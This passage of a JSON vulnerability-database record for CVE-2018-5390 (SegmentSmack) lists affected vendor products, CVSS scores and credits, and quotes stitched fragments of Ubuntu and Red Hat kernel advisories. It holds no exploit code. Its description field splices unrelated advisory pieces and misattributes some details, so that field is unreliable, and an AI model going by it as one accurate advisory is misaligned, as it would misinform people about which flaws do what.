                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.6.3",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:3.2.2:p5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:3.2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.0:p11:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.1:p8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.2:p4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:a10networks:advanced_core_operating_system:4.1.4:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:meeting_management:1.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:meeting_management:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway_series:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:collaboration_meeting_rooms:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:webex_video_mesh:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:webex_hybrid_data_security:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:network_assurance_engine:2.1\\(1a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:digital_network_architecture_center:1.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:threat_grid-cloud:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway:x8.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway:x8.10.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway:x8.10.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway:x8.10.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway:x8.10.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:cisco:expressway:x8.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_video_communication_server_firmware:x8.10:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_video_communication_server_firmware:x8.10.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_video_communication_server_firmware:x8.10.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_video_communication_server_firmware:x8.10.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_video_communication_server_firmware:x8.10.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_video_communication_server_firmware:x8.11:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:telepresence_video_communication_server:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_conductor_firmware:xc4.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_conductor_firmware:xc4.3.1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_conductor_firmware:xc4.3.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_conductor_firmware:xc4.3.3:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:telepresence_conductor_firmware:xc4.3.4:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:telepresence_conductor:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Juha-Matti Tilli",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2018-5390",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-135421",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-5390",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201808-175",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-135421",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135421"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-175"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5390"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel versions 4.9+ can be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service. An input validation error vulnerability exists in the Linux kernel version 4.9+. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n(BZ#1594915)\n\n4. As a consequence, the\nvirtualized guests sometimes mishandled the request to perform the\nmicrocode update and became unresponsive in the early boot stage. (BZ#1618386)\n\n4. ==========================================================================\nUbuntu Security Notice USN-3742-3\nAugust 21, 2018\n\nlinux-lts-trusty regressions\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nUSN-3742-2 introduced regressions in the Linux Hardware Enablement\n(HWE) kernel for Ubuntu 12.04 ESM. \n\nSoftware Description:\n- linux-lts-trusty: Linux hardware enablement kernel from Trusty for Precise ESM\n\nDetails:\n\nUSN-3742-2 introduced mitigations in the Linux Hardware Enablement\n(HWE) kernel for Ubuntu 12.04 ESM to address L1 Terminal Fault (L1TF)\nvulnerabilities (CVE-2018-3620, CVE-2018-3646). Unfortunately, the\nupdate introduced regressions that caused kernel panics when booting\nin some environments as well as preventing Java applications from\nstarting. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that memory present in the L1 data cache of an Intel CPU\n core may be exposed to a malicious process that is executing on the CPU\n core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local\n attacker in a guest virtual machine could use this to expose sensitive\n information (memory from other guests or the host OS). (CVE-2018-3646)\n\n It was discovered that memory present in the L1 data cache of an Intel CPU\n core may be exposed to a malicious process that is executing on the CPU\n core. This vulnerability is also known as L1 Terminal Fault (L1TF). (CVE-2018-3620)\n\n Andrey Konovalov discovered an out-of-bounds read in the POSIX\n timers subsystem in the Linux kernel. A local attacker could use\n this to cause a denial of service (system crash) or expose sensitive\n information. A remote attacker could use this to cause a\n denial of service. A remote attacker could use this to\n cause a denial of service. (CVE-2018-5391)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n  linux-image-3.13.0-156-generic  3.13.0-156.206~precise1\n  linux-image-3.13.0-156-generic-lpae  3.13.0-156.206~precise1\n  linux-image-generic-lpae-lts-trusty  3.13.0.156.146\n  linux-image-generic-lts-trusty  3.13.0.156.146\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 6.6) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* After updating the system to prevent the L1 Terminal Fault (L1TF)\nvulnerability, only one thread was detected on systems that offer\nprocessing of two threads on a single processor core. With this update, the\n\"__max_smt_threads()\" function has been fixed. (BZ#1625334)\n\n* Previously, a kernel panic occurred when the kernel tried to make an out\nof bound access to the array that describes the L1 Terminal Fault (L1TF)\nmitigation state on systems without Extended Page Tables (EPT) support. \nThis update extends the array of mitigation states to cover all the states,\nwhich effectively prevents out of bound array access. Also, this update\nenables rejecting invalid, irrelevant values, that might be erroneously\nprovided by the userspace. (BZ#1629633)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2018:2384-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2018:2384\nIssue date:        2018-08-14\nCVE Names:         CVE-2017-13215 CVE-2018-3620 CVE-2018-3646\n                   CVE-2018-3693 CVE-2018-5390 CVE-2018-7566\n                   CVE-2018-10675\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - noarch, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - noarch, ppc64le\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* Modern operating systems implement virtualization of physical memory to\nefficiently use available system resources and provide inter-domain\nprotection through access control and isolation. The L1TF issue was found\nin the way the x86 microprocessor designs have implemented speculative\nexecution of instructions (a commonly used performance optimisation) in\ncombination with handling of page-faults caused by terminated virtual to\nphysical address resolving process. As a result, an unprivileged attacker\ncould use this flaw to read privileged memory of the kernel or other\nprocesses and/or cross guest/host boundaries to read host memory by\nconducting targeted cache side-channel attacks. (CVE-2018-3620,\nCVE-2018-3646)\n\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions past bounds\ncheck. The flaw relies on the presence of a precisely-defined instruction\nsequence in the privileged code and the fact that memory writes occur to an\naddress which depends on the untrusted value. Such writes cause an update\ninto the microprocessor\u0027s data cache even for speculatively executed\ninstructions that never actually commit (retire). As a result, an\nunprivileged attacker could use this flaw to influence speculative\nexecution and/or read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3693)\n\n* A flaw named SegmentSmack was found in the way the Linux kernel handled\nspecially crafted TCP packets. A remote attacker could use this flaw to\ntrigger time and calculation expensive calls to tcp_collapse_ofo_queue()\nand tcp_prune_ofo_queue() functions by sending specially modified packets\nwithin ongoing TCP sessions which could lead to a CPU saturation and hence\na denial of service on the system. Maintaining the denial of service\ncondition requires continuous two-way TCP sessions to a reachable open\nport, thus the attacks cannot be performed using spoofed IP addresses. \n(CVE-2018-5390)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function\n(CVE-2017-13215)\n\n* kernel: mm: use-after-free in do_get_mempolicy function allows local DoS\nor other unspecified impact (CVE-2018-10675)\n\n* kernel: race condition in snd_seq_write() may lead to UAF or OOB access\n(CVE-2018-7566)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Intel OSSIRT (Intel.com) for reporting\nCVE-2018-3620 and CVE-2018-3646; Vladimir Kiriansky (MIT) and Carl\nWaldspurger (Carl Waldspurger Consulting) for reporting CVE-2018-3693; and\nJuha-Matti Tilli (Aalto University, Department of Communications and\nNetworking and Nokia Bell Labs) for reporting CVE-2018-5390. \n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of the bug fixes in this advisory. See the\ndescriptions in the related Knowledge Article:\n\nhttps://access.redhat.com/articles/3527791\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1535173 - CVE-2017-13215 kernel: crypto: privilege escalation in skcipher_recvmsg function\n1550142 - CVE-2018-7566 kernel: race condition in snd_seq_write() may lead to UAF or OOB-access\n1575065 - CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact\n1581650 - CVE-2018-3693 Kernel: speculative bounds check bypass store\n1585005 - CVE-2018-3646 Kernel: hw: cpu: L1 terminal fault (L1TF)\n1601704 - CVE-2018-5390 kernel: TCP segments with random offsets allow a remote denial of service (SegmentSmack)\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-862.11.6.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm\nkernel-doc-3.10.0-862.11.6.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-headers-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm\nperf-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-862.11.6.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm\nkernel-doc-3.10.0-862.11.6.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-headers-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm\nperf-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-862.11.6.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm\nkernel-doc-3.10.0-862.11.6.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debug-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-devel-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-headers-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-tools-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.ppc64.rpm\nperf-3.10.0-862.11.6.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\npython-perf-3.10.0-862.11.6.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debug-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-devel-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-headers-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.ppc64le.rpm\nperf-3.10.0-862.11.6.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\npython-perf-3.10.0-862.11.6.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debug-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-862.11.6.el7.s390x.rpm\nkernel-devel-3.10.0-862.11.6.el7.s390x.rpm\nkernel-headers-3.10.0-862.11.6.el7.s390x.rpm\nkernel-kdump-3.10.0-862.11.6.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-862.11.6.el7.s390x.rpm\nperf-3.10.0-862.11.6.el7.s390x.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\npython-perf-3.10.0-862.11.6.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-devel-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-headers-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.x86_64.rpm\nperf-3.10.0-862.11.6.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-3.10.0-862.11.6.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm\nkernel-doc-3.10.0-862.11.6.el7.noarch.rpm\n\nppc64le:\nkernel-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debug-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-devel-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-headers-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-862.11.6.el7.ppc64le.rpm\nperf-3.10.0-862.11.6.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\npython-perf-3.10.0-862.11.6.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.11.6.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debug-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debug-devel-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-862.11.6.el7.s390x.rpm\nkernel-devel-3.10.0-862.11.6.el7.s390x.rpm\nkernel-headers-3.10.0-862.11.6.el7.s390x.rpm\nkernel-kdump-3.10.0-862.11.6.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-862.11.6.el7.s390x.rpm\nk